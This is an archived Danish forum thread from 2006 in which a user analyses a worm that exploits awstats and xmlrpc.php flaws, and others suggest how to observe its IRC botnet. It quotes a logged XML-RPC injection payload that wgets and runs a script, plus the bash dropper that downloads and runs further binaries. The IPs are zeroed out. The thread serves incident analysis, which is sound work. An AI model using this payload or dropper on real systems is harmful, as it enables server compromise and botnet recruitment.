/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Sikkerhed
#NavnPoint
stl_s 37026
arlet 26827
miritdk 20260
o.v.n. 12167
als 8951
refi 8694
tedd 8272
BjarneD 7338
Klaudi 7257
10  molokyle 6481
Se mor, jeg har fanget en Fraggel!
Fra : Niels Callesøe


Dato : 09-01-06 20:54

Haps. Så fik jeg den langt om længe. Der er åbenbart en
auto-rooter/zombie der spreder sig via hhv. en fejl i awstats og
xmlrpc (fra et eller andet stykke blogware), så vidt jeg med mine
begrænsede kundskaber kan komme frem til.

Jeg ville normalt ikke interessere mig sønderligt for orm-du-jour,
men Giggle kender ikke noget til den her fætter, og så bliver man jo
nysgerrig.

Anyway, jeg startede med at konstatere et lidt særpræget POST til
xmlrpc.php i min log, konfigurerede lidt ekstra logging, og kunne så
konstatere at der åbenbart findes en mere eller mindre kendt sårbarhed
der i nogle situationer kan medføre afvikling af kode -- kaldet ser
således ud:

2006-01-09 10:53:17 Input: <?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_';echo `cd /tmp;wget 000.000.000.000/killos;chmod +x killos;./killos `;echo '_end_';exit;/*</name></value></param></params></methodCall>

.... hvor IP adressen (her udskiftet med 4x000) der hentes fra
selvfølgelig skifter fra zombie til zombie, og det gør navnet på det
script der hentes også.

De første par gange hvor jeg har forsøgt at snuppe en kopi af
scriptet til analyse, har det manglet eller den pågældende maskine
har ikke svaret. Men her til aften prøvede jeg så lige igen, og så
var der bid. Scriptet er en helt basic dropper:

$ cat killos
#!/bin/bash
wget 000.000.000.000/nikonhome
chmod 744 nikonhome
../nikonhome
wget 000.000.000.000/kis
chmod 755 kis
../kis

.... hvor nikonhome tilsyneladende er en IRC-client af en eller anden
art, og nikonhome er "selve" ormen (begge dele er konstateret ved
hjælp af strings(1)). Man kan selvfølgelig meget let forestille sig
at ogås 'kis' og 'nikonhome' bare er tilfældige navne der ændrer sig
fra installation til installation.

Det kommer nok ikke som nogen overraskelse at IRC-klienten
tilsyneladende forbinder til undernet for at finde sin botmaster.

Anyway. Jeg pakker den nok bare væk som et kuriosum, men hvis der er
et eller flere af gruppens faste bidragsydere der skulle have lyst til
at kigge nærmere på den, så sig endelig til.

--
Niels Callesøe - dk pfy @work
pfy[at]nntp.dk - http://www.t29.dk/~nica/disclaimer.php

This space for rant.

 
 
Christian E. Lysel (09-01-2006)
Kommentar
Fra : Christian E. Lysel


Dato : 09-01-06 21:30

Niels Callesøe wrote:
> Anyway. Jeg pakker den nok bare væk som et kuriosum, men hvis der er
> et eller flere af gruppens faste bidragsydere der skulle have lyst til
> at kigge nærmere på den, så sig endelig til.

Prøv i et selvstændigt miljø at starte IRC klienten og have en sniffer
kørende.

Herefter kan du selv manuelt kontakte IRC serveren .... der bliver så
hurtigt tomt for mennesker ...



Niels Callesøe (09-01-2006)
Kommentar
Fra : Niels Callesøe


Dato : 09-01-06 22:22

Christian E. Lysel wrote in
<news:43c2c7b9$0$1775$edfadb0f@dread11.news.tele.dk>:

>> Anyway. Jeg pakker den nok bare væk som et kuriosum, men hvis der
>> er et eller flere af gruppens faste bidragsydere der skulle have
>> lyst til at kigge nærmere på den, så sig endelig til.
>
> Prøv i et selvstændigt miljø at starte IRC klienten og have en
> sniffer kørende.
>
> Herefter kan du selv manuelt kontakte IRC serveren .... der bliver
> så hurtigt tomt for mennesker ...

Mjaeh, undernet bliver nok ikke tømt bare fordi et eller andet botnet
er nød til at skifte kanal. ;)

Faktisk tror jeg tricket ville være at have 2 klienter kørende, så man
fra den ene kunne holde øje med hvor den anden bliver omdirrigeret til.

Men, helt ærligt, så har jeg sgu for meget andet at lave i mit liv til
at jeg gider bruge tid på at dukke mig i ugevis for en eller anden
pissed-off kiddie med et botnet. Jeg synes heller ikke jeg hører dig
melde dig frivilligt...

--
Niels Callesøe - dk pfy @work
pfy[at]nntp.dk - http://www.t29.dk/~nica/disclaimer.php

This space for rant.

Christian E. Lysel (10-01-2006)
Kommentar
Fra : Christian E. Lysel


Dato : 10-01-06 00:20

Niels Callesøe wrote:
> Mjaeh, undernet bliver nok ikke tømt bare fordi et eller andet botnet
> er nød til at skifte kanal. ;)

Jeg mente en kanal.

bot'erne i kanalen går "tabt", da de typisk er hardkodet.

> Faktisk tror jeg tricket ville være at have 2 klienter kørende, så man
> fra den ene kunne holde øje med hvor den anden bliver omdirrigeret til.

Hvis en klient skal omdirrigeres, hvilket jeg ikke har set før.

> Men, helt ærligt, så har jeg sgu for meget andet at lave i mit liv til
> at jeg gider bruge tid på at dukke mig i ugevis for en eller anden
> pissed-off kiddie med et botnet. Jeg synes heller ikke jeg hører dig
> melde dig frivilligt...

De har ikke før voldt mig problemmer, ikke andet end der blev lidt tomt,
udover bot'erne.

Efter følgende dukkede de aldrig op, det var interessant at se hvilke
adresser de kom fra. Diverse socks proxy servere rundt omkring.

Søg
Reklame
Statistik
Spørgsmål : 177552
Tips : 31968
Nyheder : 719565
Indlæg : 6408849
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste